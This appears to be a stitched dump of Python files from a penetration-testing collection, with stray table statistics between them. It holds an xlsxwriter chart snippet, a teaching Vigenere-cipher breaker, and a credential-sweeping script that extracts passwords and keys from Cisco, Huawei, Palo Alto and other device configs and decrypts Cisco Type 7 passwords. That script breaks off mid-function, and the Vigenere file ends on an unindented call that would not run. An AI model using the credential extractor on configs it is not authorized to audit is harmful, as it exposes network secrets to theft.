school_data = [['Computer Science', 235, 3.44, datetime(2015, 07, 23, 18, 00, 00)],
               ['Chemistry', 201, 3.26, datetime(2015, 07, 25, 9, 30, 00)],
               ['Forensics', 99, 3.8, datetime(2015, 07, 23, 9, 30, 00)],
               ['Astronomy', 115, 3.21, datetime(2015, 07, 19, 15, 30, 00)]]
def writeXLSX(data):
    """Write *data* rows into MyWorkbook.xlsx as a table on sheet 'MySheet',
    plus a column chart of the per-department GPA column."""
    workbook = xlsxwriter.Workbook('MyWorkbook.xlsx')
    main_sheet = workbook.add_worksheet('MySheet')
    date_format = workbook.add_format({'num_format': 'mm/dd/yy hh:mm:ss AM/PM'})

    # Table spans the header row plus one row per data entry.
    last_row = str(len(data) + 1)
    main_sheet.add_table(
        ('A1:D' + last_row),
        {'data': data,
         'columns': [{'header': 'Department'},
                     {'header': 'Students'},
                     {'header': 'Cumulative GPA'},
                     {'header': 'Final Date', 'format': date_format}]})

    # Chart GPA (column C) per department (column A).
    department_grades = workbook.add_chart({'type': 'column'})
    department_grades.set_title({'name': 'Department and Grade distribution'})
    department_grades.add_series({'categories': '=MySheet!$A$2:$A$5',
                                  'values': '=MySheet!$C$2:$C$5'})
    main_sheet.insert_chart('A8', department_grades)
    workbook.close()
| 44 | 107 | 0.549847 |
cybersecurity-penetration-testing | # Vigenere Cipher Hacker
# http://inventwithpython.com/hacking (BSD Licensed)
import itertools, re
import vigenereCipher, pyperclip, freqAnalysis, detectEnglish
# Alphabet used for both keys and ciphertext (uppercase A-Z only).
LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
SILENT_MODE = False # if set to True, program doesn't print attempts
NUM_MOST_FREQ_LETTERS = 4 # attempts this many letters per subkey
MAX_KEY_LENGTH = 16 # will not attempt keys longer than this
NONLETTERS_PATTERN = re.compile('[^A-Z]')  # matches everything that is NOT an uppercase letter
def main():
    """Demo entry point: hack a hard-coded Vigenere ciphertext and, on
    success, print the plaintext and copy it to the clipboard."""
    # Instead of typing this ciphertext out, you can copy & paste it
    # from http://invpy.com/vigenereHacker.py
    ciphertext = """Adiz Avtzqeci Tmzubb wsa m Pmilqev halpqavtakuoi, lgouqdaf, kdmktsvmztsl, izr xoexghzr kkusitaaf. Vz wsa twbhdg ubalmmzhdad qz hce vmhsgohuqbo ox kaakulmd gxiwvos, krgdurdny i rcmmstugvtawz ca tzm ocicwxfg jf "stscmilpy" oid "uwydptsbuci" wabt hce Lcdwig eiovdnw. Bgfdny qe kddwtk qjnkqpsmev ba pz tzm roohwz at xoexghzr kkusicw izr vrlqrwxist uboedtuuznum. Pimifo Icmlv Emf DI, Lcdwig owdyzd xwd hce Ywhsmnemzh Xovm mby Cqxtsm Supacg (GUKE) oo Bdmfqclwg Bomk, Tzuhvif'a ocyetzqofifo ositjm. Rcm a lqys ce oie vzav wr Vpt 8, lpq gzclqab mekxabnittq tjr Ymdavn fihog cjgbhvnstkgds. Zm psqikmp o iuejqf jf lmoviiicqg aoj jdsvkavs Uzreiz qdpzmdg, dnutgrdny bts helpar jf lpq pjmtm, mb zlwkffjmwktoiiuix avczqzs ohsb ocplv nuby swbfwigk naf ohw Mzwbms umqcifm. Mtoej bts raj pq kjrcmp oo tzm Zooigvmz Khqauqvl Dincmalwdm, rhwzq vz cjmmhzd gvq ca tzm rwmsl lqgdgfa rcm a kbafzd-hzaumae kaakulmd, hce SKQ. Wi 1948 Tmzubb jgqzsy Msf Zsrmsv'e Qjmhcfwig Dincmalwdm vt Eizqcekbqf Pnadqfnilg, ivzrw pq onsaafsy if bts yenmxckmwvf ca tzm Yoiczmehzr uwydptwze oid tmoohe avfsmekbqr dn eifvzmsbuqvl tqazjgq. Pq kmolm m dvpwz ab ohw ktshiuix pvsaa at hojxtcbefmewn, afl bfzdakfsy okkuzgalqzu xhwuuqvl jmmqoigve gpcz ie hce Tmxcpsgd-Lvvbgbubnkq zqoxtawz, kciup isme xqdgo otaqfqev qz hce 1960k. Bgfdny'a tchokmjivlabk fzsmtfsy if i ofdmavmz krgaqqptawz wi 1952, wzmz vjmgaqlpad iohn wwzq goidt uzgeyix wi tzm Gbdtwl Wwigvwy. Vz aukqdoev bdsvtemzh rilp rshadm tcmmgvqg (xhwuuqvl uiehmalqab) vs sv mzoejvmhdvw ba dmikwz. Hpravs rdev qz 1954, xpsl whsm tow iszkk jqtjrw pug 42id tqdhcdsg, rfjm ugmbddw xawnofqzu. Vn avcizsl lqhzreqzsy tzif vds vmmhc wsa eidcalq; vds ewfvzr svp gjmw wfvzrk jqzdenmp vds vmmhc wsa mqxivmzhvl. Gv 10 Esktwunsm 2009, fgtxcrifo mb Dnlmdbzt uiydviyv, Nfdtaat Dmiem Ywiikbqf Bojlab Wrgez avdw iz cafakuog pmjxwx ahwxcby gv nscadn at ohw Jdwoikp scqejvysit xwd "hce sxboglavs kvy zm ion tjmmhzd." 
Sa at Haq 2012 i bfdvsbq azmtmd'g widt ion bwnafz tzm Tcpsw wr Zjrva ivdcz eaigd yzmbo Tmzubb a kbmhptgzk dvrvwz wa efiohzd."""
    hackedMessage = hackVigenere(ciphertext)
    if hackedMessage != None:
        print('Copying hacked message to clipboard:')
        print(hackedMessage)
        pyperclip.copy(hackedMessage)
    else:
        print('Failed to hack encryption.')
def findRepeatSequencesSpacings(message):
    """Find every 3- to 5-letter sequence that repeats in *message*.

    Returns a dict mapping each repeated sequence to the list of spacings
    (number of letters between an occurrence and each later repeat).
    Non-letter characters are stripped before scanning.
    """
    # Work on an uppercase, letters-only copy ([^A-Z] filter, identical to
    # the module-wide NONLETTERS_PATTERN).
    message = re.sub('[^A-Z]', '', message.upper())

    seqSpacings = {}  # keys are sequences, values are lists of int spacings
    for seqLen in range(3, 6):
        for seqStart in range(len(message) - seqLen):
            seq = message[seqStart:seqStart + seqLen]
            # Look for this sequence in the rest of the message.
            # BUG FIX: the original upper bound was len(message) - seqLen,
            # which never examined a repeat occupying the final seqLen
            # characters of the text; the bound must be one higher so the
            # last valid start index (len - seqLen) is included.
            for i in range(seqStart + seqLen, len(message) - seqLen + 1):
                if message[i:i + seqLen] == seq:
                    # Found a repeat; record its distance from the original.
                    seqSpacings.setdefault(seq, []).append(i - seqStart)
    return seqSpacings
def getUsefulFactors(num, maxFactor=None):
    """Return the factors of *num* that matter for Kasiski examination.

    For every factor i of num with 2 <= i <= maxFactor, both i and its
    complementary factor num // i are included (the complement may exceed
    maxFactor; callers filter those out later).  The result is
    de-duplicated, so ordering is not guaranteed.  For example,
    getUsefulFactors(144) yields {2, 3, 4, 6, 8, 9, 12, 16, 18, 24, 36,
    48, 72} as a list.

    *maxFactor* is a new optional parameter (backward compatible): it
    defaults to the module-wide MAX_KEY_LENGTH, so existing callers are
    unaffected, while tests and other users can supply their own bound.
    """
    if maxFactor is None:
        maxFactor = MAX_KEY_LENGTH
    if num < 2:
        return []  # numbers less than 2 have no useful factors

    factors = []
    # 1 is never a useful factor, so start at 2.
    for i in range(2, maxFactor + 1):
        if num % i == 0:
            factors.append(i)
            factors.append(num // i)  # complementary factor (exact division)

    # The complementary factor can be 1 (when num <= maxFactor); drop it.
    if 1 in factors:
        factors.remove(1)
    return list(set(factors))
def getItemAtIndexOne(x):
    """Sort-key helper: return the element at index 1 of *x*.

    Used as the ``key=`` function when ordering (value, score) tuples by
    their score.
    """
    score = x[1]
    return score
def getMostCommonFactors(seqFactors, maxFactor=None):
    """Tally how often each factor occurs across all repeated sequences.

    *seqFactors* maps each repeated sequence to the list of factors of its
    spacings, e.g. {'GFD': [2, 3, 4, 6, 9, ...], 'ALW': [2, 3, 4, ...]}.
    Returns a list of (factor, count) tuples sorted by count, most common
    first, keeping only factors <= maxFactor, since larger values cannot
    be key lengths this program would attempt.

    *maxFactor* is a new optional parameter (backward compatible); it
    defaults to the module-wide MAX_KEY_LENGTH for existing callers.
    """
    from collections import Counter  # stdlib replacement for manual tallying

    if maxFactor is None:
        maxFactor = MAX_KEY_LENGTH

    factorCounts = Counter()
    for factorList in seqFactors.values():
        factorCounts.update(factorList)

    # Keep only plausible key lengths, then sort by popularity, descending.
    # list.sort is stable, so ties keep their first-encountered order just
    # like the original hand-rolled dict-based implementation.
    factorsByCount = [(factor, count) for factor, count in factorCounts.items()
                      if factor <= maxFactor]
    factorsByCount.sort(key=lambda pair: pair[1], reverse=True)
    return factorsByCount
def kasiskiExamination(ciphertext):
    """Guess likely key lengths for *ciphertext* via Kasiski examination.

    Returns the candidate key lengths ordered from most to least likely.
    """
    # Distances between repeated 3-5 letter chunks, e.g.
    # {'EXG': [192], 'NAF': [339, 972, 633], ...}
    repeatedSeqSpacings = findRepeatSequencesSpacings(ciphertext)

    # Factor every spacing: the true key length should divide most of them.
    seqFactors = {}
    for seq, spacings in repeatedSeqSpacings.items():
        collected = []
        for spacing in spacings:
            collected.extend(getUsefulFactors(spacing))
        seqFactors[seq] = collected

    # Most frequently occurring factors are the best key-length guesses;
    # strip the counts and return just the factors, in that order.
    return [factor for factor, _count in getMostCommonFactors(seqFactors)]
def getNthSubkeysLetters(n, keyLength, message):
    """Return every keyLength-th letter of *message*, starting with the nth.

    E.g. getNthSubkeysLetters(1, 3, 'ABCABCABC') returns 'AAA'
         getNthSubkeysLetters(2, 3, 'ABCABCABC') returns 'BBB'
         getNthSubkeysLetters(3, 3, 'ABCABCABC') returns 'CCC'
         getNthSubkeysLetters(1, 5, 'ABCDEFGHI') returns 'AF'

    Anything that is not an uppercase letter is stripped first (the same
    [^A-Z] filter as the module-wide NONLETTERS_PATTERN), so callers are
    expected to pass uppercased text.
    """
    # Strip non-letters, then take a strided slice: start at index n-1 and
    # step by keyLength.  This replaces the original manual while-loop and
    # ''.join() with a single idiomatic (and faster) slice.
    letters = re.sub('[^A-Z]', '', message)
    return letters[n - 1::keyLength]
def attemptHackWithKeyLength(ciphertext, mostLikelyKeyLength):
    """Try to hack *ciphertext* assuming a key of mostLikelyKeyLength letters.

    For each key position, score all 26 subkeys by English letter-frequency
    match and keep the best NUM_MOST_FREQ_LETTERS candidates; then try every
    combination of those candidates.  Decryptions that look like English are
    shown to the user, who confirms interactively via input().  Returns the
    plaintext (original casing restored) or None.
    """
    # Determine the most likely letters for each letter in the key.
    ciphertextUp = ciphertext.upper()
    # allFreqScores is a list of mostLikelyKeyLength number of lists.
    # These inner lists are the freqScores lists.
    allFreqScores = []
    for nth in range(1, mostLikelyKeyLength + 1):
        nthLetters = getNthSubkeysLetters(nth, mostLikelyKeyLength, ciphertextUp)
        # freqScores is a list of tuples like:
        # [(<letter>, <Eng. Freq. match score>), ... ]
        # List is sorted by match score. Higher score means better match.
        # See the englishFreqMatchScore() comments in freqAnalysis.py.
        freqScores = []
        for possibleKey in LETTERS:
            decryptedText = vigenereCipher.decryptMessage(possibleKey, nthLetters)
            keyAndFreqMatchTuple = (possibleKey, freqAnalysis.englishFreqMatchScore(decryptedText))
            freqScores.append(keyAndFreqMatchTuple)
        # Sort by match score
        freqScores.sort(key=getItemAtIndexOne, reverse=True)
        # Keep only the best NUM_MOST_FREQ_LETTERS candidates per position.
        allFreqScores.append(freqScores[:NUM_MOST_FREQ_LETTERS])
    if not SILENT_MODE:
        for i in range(len(allFreqScores)):
            # use i + 1 so the first letter is not called the "0th" letter
            print('Possible letters for letter %s of the key: ' % (i + 1), end='')
            for freqScore in allFreqScores[i]:
                print('%s ' % freqScore[0], end='')
            print() # print a newline
    # Try every combination of the most likely letters for each position
    # in the key.
    for indexes in itertools.product(range(NUM_MOST_FREQ_LETTERS), repeat=mostLikelyKeyLength):
        # Create a possible key from the letters in allFreqScores
        possibleKey = ''
        for i in range(mostLikelyKeyLength):
            possibleKey += allFreqScores[i][indexes[i]][0]
        if not SILENT_MODE:
            print('Attempting with key: %s' % (possibleKey))
        decryptedText = vigenereCipher.decryptMessage(possibleKey, ciphertextUp)
        if detectEnglish.isEnglish(decryptedText):
            # Set the hacked ciphertext to the original casing.
            origCase = []
            for i in range(len(ciphertext)):
                if ciphertext[i].isupper():
                    origCase.append(decryptedText[i].upper())
                else:
                    origCase.append(decryptedText[i].lower())
            decryptedText = ''.join(origCase)
            # Check with user to see if the key has been found.
            print('Possible encryption hack with key %s:' % (possibleKey))
            print(decryptedText[:200]) # only show first 200 characters
            print()
            print('Enter D for done, or just press Enter to continue hacking:')
            response = input('> ')
            if response.strip().upper().startswith('D'):
                return decryptedText
    # No English-looking decryption found, so return None.
    return None
def hackVigenere(ciphertext):
    """Attempt to break a Vigenere ciphertext.

    Tries the key lengths suggested by Kasiski examination first, then
    brute-forces the remaining lengths up to MAX_KEY_LENGTH.  Returns the
    recovered plaintext, or None if every attempt failed.
    """
    # First, do Kasiski examination to figure out the likely key lengths.
    allLikelyKeyLengths = kasiskiExamination(ciphertext)
    if not SILENT_MODE:
        keyLengthStr = ''
        for keyLength in allLikelyKeyLengths:
            keyLengthStr += '%s ' % (keyLength)
        print('Kasiski Examination results say the most likely key lengths are: ' + keyLengthStr + '\n')

    # BUG FIX: initialize hackedMessage up front.  In the original, an empty
    # candidate list (e.g. a short ciphertext with no repeated sequences)
    # left the name unbound and the `if hackedMessage == None` test below
    # raised NameError instead of falling through to brute force.
    hackedMessage = None
    for keyLength in allLikelyKeyLengths:
        if not SILENT_MODE:
            print('Attempting hack with key length %s (%s possible keys)...' % (keyLength, NUM_MOST_FREQ_LETTERS ** keyLength))
        hackedMessage = attemptHackWithKeyLength(ciphertext, keyLength)
        if hackedMessage is not None:
            break

    # If none of the key lengths found by Kasiski examination worked,
    # brute-force through the remaining key lengths.
    if hackedMessage is None:
        if not SILENT_MODE:
            print('Unable to hack message with likely key length(s). Brute forcing key length...')
        for keyLength in range(1, MAX_KEY_LENGTH + 1):
            # don't re-check key lengths already tried from Kasiski
            if keyLength not in allLikelyKeyLengths:
                if not SILENT_MODE:
                    print('Attempting hack with key length %s (%s possible keys)...' % (keyLength, NUM_MOST_FREQ_LETTERS ** keyLength))
                hackedMessage = attemptHackWithKeyLength(ciphertext, keyLength)
                if hackedMessage is not None:
                    break
    return hackedMessage
# If vigenereHacker.py is run (instead of imported as a module) call
# the main() function.
if __name__ == '__main__':
main() | 48.19305 | 2,052 | 0.660675 |
cybersecurity-penetration-testing | #!/usr/bin/python
#
# Script intendend to sweep Cisco, Huawei and possibly other network devices
# configuration files in order to extract plain and cipher passwords out of them.
# Equipped with functionality to decrypt Cisco Type 7 passwords.
#
# Mariusz Banach, mgeeky '18-20
#
import re
import os
import sys
import argparse
#
# In order to extend capabilities of this script, one can add custom entries
# to the below dictionary. Contents are:
# regexes = {
# 'Technology' : {
# 'Pattern Name' : r'pattern',
# }
# }
#
regexes = {
'Cisco' : {
'Enable secret' : r'enable secret \d+ \bcrypt',
'Privileged command level password' : r'password \password',
'Enable password' : r'enable password \password',
'Enable password(2)' : r'enable password level \d+ \password',
'Username/password' : r'username \name .*(?:password|secret \d) \password',
'HSRP Authentication string' : r'standby \d+ authentication \password',
'HSRP Authentication Text' : r'authentication text \password',
'HSRP Authentication MD5 key-string': r'standby \d+ authentication md5 key-string \keystring',
'OSPF Authentication string' : r'ip ospf authentication-key \password',
'OSPF Authentication MD5 string' : r'ip ospf message-digest-key \d+ md5 \password',
'EIGRP Key-string' : r'key-string \password',
'BGP Neighbor Authentication' : r'neighbor (\ip) password 7 \hash',
'AAA RADIUS Server Auth-Key' : r'server-private \ip auth-port \d+ acct-port \d+ key \d+ \hash',
'NTP Authentication MD5 Key' : r'ntp authentication-key \d+ md5 \password \d',
'TACACS-Server' : r'tacacs-server host \ip key \d \hash',
'RADIUS Server Key' : r'key 7 \hash',
'SNMP-Server User/Password' : r'snmp-server user \name [\w-]+ auth md5 0x\hash priv 0x\hash localizedkey',
'FTP Server Username' : r'ip ftp username \name',
'FTP Server Password' : r'ip ftp password \password',
'ISAKMP Pre-Shared Key' : r'crypto isakmp key \password(?: address \ip)?',
'SNMP-Server User Auth & Encr keys' : r'snmp-server user \name .* encrypted auth md5 ([0-9a-f\:]+) priv aes \d+ ([0-9a-f\:]+)',
'PPP PAP Sent Username & Password' : r'ppp pap sent-username \name password \password',
'AAA TACACS+/RADIUS Server Private' : r'server-private \ip key \password',
'AAA TACACS+ Server Private' : r'tacacs-server key \password',
'SNMP Server Community string' : r'snmp-server community \password',
'IPSec VPN ISAKMP Pre-Shared Key' : r'pre-shared-key address \ip key \password'
},
'Cisco ASA' : {
'Username and Password' : r'username \name .*password \password',
'LDAP Login password' : r'ldap-login-password \password',
'SNMP-Server authentication' : r'snmp-server user \name snmp-read-only-group v\d engineID \hash encrypted auth md5 ([0-9a-fA-F\:]+) priv aes 256 ([0-9a-fA-F\:]+)',
},
'Huawei' : {
'VTY User interface' : r'set authentication password cipher \password',
'Local User' : r'local-user \name password (?:cipher|irreversible-cipher) \password',
'NTP Authentication' : r'ntp-service authentication-keyid \d+ authentication-mode (md5|hmac-sha256) (?:cipher)?\s*\password',
'RADIUS Server Shared-Key' : r'radius-server shared-key cipher \password',
'RADIUS Server Authorization' : r'radius-server authorization \ip shared-key cipher \password',
'TACACS-Server Shared-Key Cipher' : r'hwtacacs-server shared-key cipher \password',
'SNMP-Agent Authentication MD5' : r'snmp-agent [\w-]+ v\d \name authentication-mode md5 \password',
'SNMP-Agent Authentication AES' : r'snmp-agent [\w-]+ v\d \name privacy-mode aes128 \password',
},
'Checkpoint gateway' : {
'SNMP User' : r'add snmp usm user \name security-level \w+ auth-pass-phrase-hashed \hash privacy-pass-phrase-hashed \hash privacy-protocol DES',
'Expert Password Hash' : r'set expert-password-hash \bcrypt',
'TACACS Authentication Key' : r'add aaa tacacs-servers priority \d+ server \ip key \password',
'User password-hash' : r'set user \name password-hash \bcrypt',
},
'F5 BIG-IP' : {
'Username and password' : r'manage user table create \name -pw \password',
'Configuration Sync Password' : r'redundancy config-sync sync-session-password set \password',
},
'PaloAlto Proxy' : {
'Active Directory Auth password' : r'<bind-password>([^<]+)</bind-password>',
'NTLM Password' : r'<ntlm-password>([^<]+)</ntlm-password>',
'Agent User key' : r'<agent-user-override-key>([^<]+)</agent-user-override-key>',
'User Password Hash' : r'<phash>([^<]+)</phash>',
},
'Others' : {
'Other uncategorized password' : r'.* password \password.*',
'Other uncategorized XML password' : r'password>([^<]+)<',
'Other uncategorized authentication string' : r'.* authentication \password.*',
'Other hash-key related' : r'.* key \hash',
'Cisco 7 Password' : r'\cisco7',
},
}
# Runtime options; defaults here are overwritten by parseOptions().
config = {
    'verbose' : False,
    'debug' : False,
    'lines' : 0,            # number of context lines to show around a hit
    'format' : 'normal',    # one of: raw / normal / tabular / csv
    'csv_delimiter' : ';',
    'no_others' : False,    # skip the false-positive-prone 'Others' category
    'filename' : False,     # prefix results with the source file name
    'nonunique' : False,    # report repeated credentials too
    'output' : ''           # output file path ('' = print to stdout)
}
# Named sub-patterns substituted into the rules above via processRegex():
# a literal "\name" inside a rule is replaced by markers['name'].
markers = {
    'name' : r'([\w-]+|\"[\w-]+\")',
    'ip' : r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
    'domain' : r'(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|([a-zA-Z0-9][a-zA-Z0-9-_]{1,61}[a-zA-Z0-9]))\.([a-zA-Z]{2,6}|[a-zA-Z0-9-]{2,30}\.[a-zA-Z]{2,3})',
    'hash' : r'([a-fA-F0-9]{20,})',
    'bcrypt' : r'([\$\w\.\/]+)',
    'password': r'(?:(?:\d\s+)?([^\s]+))',
    # Cisco type-7 blob, either "7 <hex>" or "<hex> 7".
    'cisco7' : r'\b(?:7 ([0-9a-f]{4,}))|(?:([0-9a-f]{4,}) 7)\b',
    'keystring': r'([a-f0-9]+)',
}
foundCreds = set()       # credential lines already reported (dedup)
maxTechnologyWidth = 0   # column widths for tabular output, set in printResults()
maxRegexpWidth = 0
results = []             # (file, technology, rule-name, creds) tuples
class Logger:
    """Minimal console logger gated by the global ``config`` flags.

    All prefixed helpers are silent unless verbose or debug output was
    requested; dbg() additionally requires debug mode.
    """

    @staticmethod
    def _write(text):
        # Single choke point for the actual output.
        sys.stdout.write(text + '\n')

    @staticmethod
    def _out(x):
        if config['debug'] or config['verbose']:
            Logger._write(x)

    @staticmethod
    def dbg(x):
        if config['debug']:
            Logger._write('[dbg] ' + x)

    @staticmethod
    def out(x):
        Logger._out('[.] ' + x)

    @staticmethod
    def info(x):
        Logger._out('[?] ' + x)

    @staticmethod
    def err(x):
        Logger._out('[!] ' + x)

    @staticmethod
    def fail(x):
        Logger._out('[-] ' + x)

    @staticmethod
    def ok(x):
        Logger._out('[+] ' + x)
def processRegex(inputRegex):
    """Expand backslash-name placeholders (see ``markers``) inside a rule
    and anchor the resulting pattern to a whole, whitespace-tolerant line."""
    for marker, pattern in markers.items():
        token = '\\' + marker
        if token in inputRegex:
            inputRegex = inputRegex.replace(token, pattern)
    return '^\\s*{}\\s*.*$'.format(inputRegex)
def cisco7Decrypt(data):
    """Decrypt a Cisco "type 7" obfuscated password.

    The scheme XORs each byte with a fixed key stream (xlat); the first two
    characters of *data* are the decimal starting offset into that stream,
    the rest are hex byte pairs.  Returns the plaintext, or '' when *data*
    is not a valid type-7 blob.  (source: https://github.com/theevilbit/ciscot7)
    """
    xlat = [
        0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c, 0x2e,
        0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44,
        0x48, 0x53, 0x55, 0x42, 0x73, 0x67, 0x76, 0x63, 0x61, 0x36, 0x39,
        0x38, 0x33, 0x34, 0x6e, 0x63, 0x78, 0x76, 0x39, 0x38, 0x37, 0x33,
        0x32, 0x35, 0x34, 0x6b, 0x3b, 0x66, 0x67, 0x38, 0x37
    ]
    result = re.search(r'(^[0-9A-Fa-f]{2})([0-9A-Fa-f]+)', data)
    if not result:
        return ''
    try:
        # Seed is parsed as DECIMAL (Cisco stores a 2-digit decimal offset);
        # a hex-only seed like '0A' raises ValueError and is rejected below.
        s, e = int(result.group(1)), result.group(2)
        dp = ''
        for pos in range(0, len(e), 2):
            magic = int(e[pos] + e[pos + 1], 16)
            newchar = ''
            if s <= 50:
                # xlat length is 51
                newchar = '%c' % (magic ^ xlat[s])
            s += 1
            if s == 51:
                s = 0
            dp += newchar
        return dp
    # BUG FIX (robustness): the original bare `except:` swallowed every
    # exception, including KeyboardInterrupt/SystemExit and genuine bugs.
    # Only the expected failure modes are treated as "not a type-7 blob":
    # ValueError (non-decimal seed, bad hex) and IndexError (odd-length hex).
    except (ValueError, IndexError):
        return ''
def tryToCisco7Decrypt(creds):
    """Scan *creds* for Cisco type-7 blobs and, if any decrypt, return a
    suffix string listing the plaintexts; otherwise return ''."""
    if not len(creds):
        return ''

    decrypted = []
    for match in re.finditer(markers['cisco7'], creds, re.I):
        # The pattern has two alternatives; pick whichever group matched.
        blob = match.group(2) if match.group(2) is not None else match.group(1)
        plain = cisco7Decrypt(blob)
        if plain:
            decrypted.append(plain)

    if not decrypted:
        return ''
    return " (decrypted cisco 7: '" + "', '".join(decrypted) + "')"
def matchLines(file, lines, technology):
    """Run every rule of *technology* against the stripped *lines* of *file*.

    Hits are appended to the global ``results`` and deduplicated through
    ``foundCreds`` (unless config['nonunique']).  Returns the hit count.
    """
    global foundCreds
    global results
    num = 0
    for rex in regexes[technology]:
        for idx in range(len(lines)):
            line = lines[idx].strip()
            # Skip lines already reported, unless duplicates were requested.
            if not config['nonunique'] and line in foundCreds:
                continue
            processedRex = processRegex(regexes[technology][rex])
            matched = re.match(processedRex, line, re.I)
            if matched:
                num += 1
                foundCreds.add(line)
                # groups(1) turns unmatched groups into the int 1, so keeping
                # only str values filters out the non-participating groups.
                f = [x for x in matched.groups(1) if type(x) == str]
                creds = '", "'.join(f)
                creds += tryToCisco7Decrypt(line)
                results.append((
                    file, technology, rex, creds
                ))
                # Optionally show N lines of surrounding context.
                if config['lines'] != 0:
                    Logger._out('\n[+] {}: {}: {}'.format(
                        technology, rex, creds
                    ))
                    if idx - config['lines'] >= 0:
                        for i in range(idx - config['lines'], idx):
                            Logger._out('[{:04}]\t\t{}'.format(i, lines[i]))
                    Logger._out('[{:04}]==>\t{}'.format(idx, line))
                    if idx + 1 + config['lines'] < len(lines):
                        for i in range(idx + 1, idx + config['lines'] + 1):
                            Logger._out('[{:04}]\t\t{}'.format(i, lines[i]))
                Logger.dbg('\tRegex used: [ {} ]'.format(processedRex))
    return num
def processFile(file):
    """Sweep a single configuration file with every rule category.

    Returns the number of credentials found (0 when the file is unreadable).
    The false-positive-prone 'Others' category runs last and only when it
    was not disabled via config['no_others'].
    """
    Logger.info('Processing file: "{}"'.format(file))
    try:
        with open(file, 'r') as f:
            lines = [line.strip() for line in f.readlines()]
    except Exception as e:
        Logger.err("Parsing file '{}' failed: {}.".format(file, str(e)))
        return 0

    num = 0
    for technology in regexes:
        if technology == 'Others':
            continue
        num += matchLines(file, lines, technology)

    if not config['no_others']:
        num += matchLines(file, lines, 'Others')
    return num
def processDir(dirname):
    """Recursively sweep every file under *dirname*; return the total hit count."""
    total = 0
    for entry in os.listdir(dirname):
        path = os.path.join(dirname, entry)
        if os.path.isdir(path):
            total += processDir(path)   # recurse into subdirectories
        elif os.path.isfile(path):
            total += processFile(path)
    return total
def parseOptions(argv):
    """Parse command-line options and populate the global ``config`` dict.

    Returns the argparse namespace on success, or False when no argument
    was supplied (usage is printed in that case).
    """
    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')
    parser.add_argument('file', metavar='<file>', type=str, help='Config file or directory to process.')
    parser.add_argument('-o', '--output', help = 'Output file.')
    parser.add_argument('-H', '--with-filename', action='store_true', help = 'Print file name next to the results')
    parser.add_argument('-R', '--show-nonunique', action='store_true', help = 'Print repeated, non unique credentials found. By default only unique references are returned.')
    parser.add_argument('-C', '--lines', metavar='N', type=int, default=0, help='Display N lines around matched credential if verbose output is enabled.')
    parser.add_argument('-f', '--format', choices=['raw', 'normal', 'tabular', 'csv'], default='normal', help="Specifies output format: 'raw' (only hashes), 'tabular', 'normal', 'csv'. Default: 'normal'")
    parser.add_argument('-N', '--no-others', dest='no_others', action='store_true', help='Don\'t match "Others" category which is false-positives prone.')
    parser.add_argument('-v', '--verbose', action='store_true', default=False, help='Display verbose output.')
    parser.add_argument('-d', '--debug', action='store_true', default=False, help='Display debug output.')

    if len(argv) < 2:
        parser.print_help()
        return False

    # NOTE(review): parse_args() reads sys.argv rather than the argv
    # parameter -- fine for the current caller (main passes sys.argv), but
    # worth confirming if this function is ever reused with a custom argv.
    args = parser.parse_args()

    config['verbose'] = args.verbose
    config['debug'] = args.debug
    config['lines'] = args.lines
    config['no_others'] = args.no_others
    config['filename'] = args.with_filename
    config['nonunique'] = args.show_nonunique
    config['output'] = args.output

    # BUG FIX: the original if/elif chain ended in
    #     config['format'] == 'normal'
    # which is a no-op comparison, not an assignment.  argparse's `choices`
    # already guarantees a valid value, so copy it over directly; the
    # outcome for the other three formats is unchanged.
    config['format'] = args.format

    return args
def printResults():
    """Render the global ``results`` into a report string in the format
    selected by config['format'] (normal / tabular / raw / csv)."""
    global maxTechnologyWidth
    global maxRegexpWidth
    global results
    # CSV Columns
    cols = ['file', 'technology', 'name', 'hashes']
    # De-duplicate result tuples unless duplicates were requested.
    if not config['nonunique']:
        results = set(results)
    def _print(file, technology, rex, creds):
        # Format a single result according to the selected output format.
        out = ''
        if config['format'] == 'tabular':
            out += '[+] {0: <{width1}} {1:^{width2}}: "{2:}"\n'.format(
                technology, rex, creds,
                width1 = maxTechnologyWidth, width2 = maxRegexpWidth
            )
        elif config['format'] == 'raw':
            credstab = creds.split('", "')
            longest = ''
            for passwd in credstab:
                if len(passwd) > len(longest):
                    longest = passwd
                # NOTE(review): `longest` is computed but never used -- the
                # original intent may have been to emit only the longest
                # candidate instead of every one; confirm before changing.
                out += '{}\n'.format(
                    passwd
                )
        elif config['format'] == 'csv':
            creds = '"{}"'.format(creds)
            # Keep the delimiter out of the rule name so columns stay aligned.
            rex = rex.replace(config['csv_delimiter'], ' ')
            out += config['csv_delimiter'].join([file, technology, rex, creds])
            out += '\n'
        else:
            out += '[+] {}: {}: "{}"\n'.format(
                technology, rex, creds
            )
        return out
    # Compute column widths for tabular output.
    # NOTE(review): maxRegexpWidth is measured from the regex PATTERN length
    # but used to pad the rule NAME column -- possibly intentional padding,
    # possibly a mix-up; confirm before changing.
    maxTechnologyWidth = 0
    maxRegexpWidth = 0
    for result in results:
        file, technology, rex, creds = result
        if len(technology) > maxTechnologyWidth:
            maxTechnologyWidth = len(technology)
        if len(regexes[technology][rex]) > maxRegexpWidth:
            maxRegexpWidth = len(regexes[technology][rex])
    maxTechnologyWidth = maxTechnologyWidth + 3
    maxRegexpWidth = maxRegexpWidth + 3
    outputToPrint = ''
    if config['format'] == 'normal' or config['format'] == 'tabular':
        outputToPrint += '\n=== CREDENTIALS FOUND:\n'
    elif config['format'] == 'csv':
        outputToPrint += config['csv_delimiter'].join(cols)
        outputToPrint += '\n'
    # Split results per file, keeping the noisy 'Others' category separate.
    resultsPerFile = {}
    otherResultsPerFile = {}
    for result in results:
        file, technology, rex, creds = result
        if technology == 'Others':
            if file not in otherResultsPerFile.keys():
                otherResultsPerFile[file] = []
            otherResultsPerFile[file].append((technology, rex, creds))
        else:
            if file not in resultsPerFile.keys():
                resultsPerFile[file] = []
            resultsPerFile[file].append((technology, rex, creds))
    for file, _results in resultsPerFile.items():
        if config['filename'] and config['format'] in ['raw', 'normal', 'tabular']:
            outputToPrint += '\nResults from file: "{}"\n'.format(file)
